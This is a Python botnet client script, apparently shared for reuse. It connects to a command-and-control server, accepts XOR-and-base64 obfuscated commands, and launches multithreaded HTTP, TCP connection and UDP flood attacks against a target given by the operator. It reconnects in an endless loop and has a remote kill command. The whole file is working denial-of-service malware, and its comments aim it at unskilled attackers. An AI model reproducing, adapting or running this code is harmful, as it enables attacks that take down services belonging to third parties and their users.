#!/usr/bin/env python3
#Code By Leeon123
#-- Python Bot version v2 --#
# Added xor encode traffic #
# Improved dos attack code #
# New process lock desgin #
# More easy for the skid #
#############################
import socket
import sys
import os
import time
import random
import threading
import base64 as b64
cnc = str("127.0.0.1")#your cnc ip
cport = int(81)#your cnc port
key = "asdfghjkloiuytresxcvbnmliuytf"
#xor key, don't edit it if u don't know wtf is this#
useragents=["Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",]
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
stop = False
def HTTP(ip, port, path):
global stop
while True:
if stop :
break
get_host = "GET "+path+"?"+str(random.randint(0,50000))+" HTTP/1.1\r\nHost: " + ip + "\r\n"
connection = "Connection: Keep-Alive\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
accept = random.choice(acceptall)
http = get_host + useragent + accept + connection + "\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((str(ip), int(port)))
for y in range(100):
s.send(str.encode(http))
#s.close()
except:
s.close()
def CC(ip, port):
global stop
while True:
if stop :
break
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(ip),int(port)))
s.send("\000".encode())
s.close()
except:
s.close()
def UDP(ip, port, size):
global stop
while True:
if stop :
break
udpbytes = random._urandom(int(size))
sendip=(str(ip),int(port))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
for y in range(thread):
s.sendto(udpbytes, sendip)
s.close()
except:
s.close()
def cmdHandle(sock):
global stop
attack = 0
sock.send(xor_enc("1337",key).encode())#login code
while True:
tmp = sock.recv(1024).decode()
if len(tmp) == 0:
main()
#print(tmp)
data = xor_dec(tmp,key)
if data[0] == '!':
try:
command = data.split()
print(command)
if command[0] == xor_dec('QBAH',key):#encoded keywords: !cc
if attack != 0:
stop = True
attack=0
stop = False
for x in range(int(command[3])):
p = threading.Thread(target=CC, args=(command[1],command[2]))
p.start()
attack+=1
elif command[0] == xor_dec('QBsQEhc=',key):#encoded keywords: !http
if attack != 0:
stop = True
attack=0
stop = False
for x in range(int(command[3])):
p = threading.Thread(target=HTTP, args =(command[1],command[2],command[4]))
p.start()
attack+=1
elif command[0] == xor_dec('QAYAFg==',key):#encoded keywords: !udp
if attack != 0:
stop = True
attack=0
stop = False
for x in range(int(command[3])):
p = threading.Thread(target=UDP, args =(command[1],command[2],command[4]))
p.start()
attack+=1
elif command[0] == xor_dec('QAAQCRc=',key):
stop = True
attack = 0#clear attack list
elif command[0] == xor_dec('QBgNCgs=',key):#!kill : kill bot
sys.exit(1)
except:
pass
if data == xor_dec("ERoKAQ==",key):#ping
sock.send(xor_enc("pong",key).encode())#keepalive and check connection alive
def main():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
#s.setsockopt(socket.SOL_TCP, socket.TCP_KEEPIDLE, 10)
#s.setsockopt(socket.SOL_TCP, socket.TCP_KEEPINTVL, 10)
s.setsockopt(socket.SOL_TCP, socket.TCP_KEEPCNT, 3)#this only can use on python3 env, python2 pls off this
s.connect((cnc,cport))
cmdHandle(s)
except Exception as e:
connect()#magic loop
def connect():
time.sleep(5)
main()
#xor enc part#
def xor_enc(string,key):
lkey=len(key)
secret=[]
num=0
for each in string:
if num>=lkey:
num=num%lkey
secret.append( chr( ord(each)^ord(key[num]) ) )
num+=1
return b64.b64encode( "".join( secret ).encode() ).decode()
def xor_dec(string,key):
leter = b64.b64decode( string.encode() ).decode()
lkey=len(key)
string=[]
num=0
for each in leter:
if num>=lkey:
num=num%lkey
string.append( chr( ord(each)^ord(key[num]) ) )
num+=1
return "".join( string )
if __name__ == '__main__':
main()
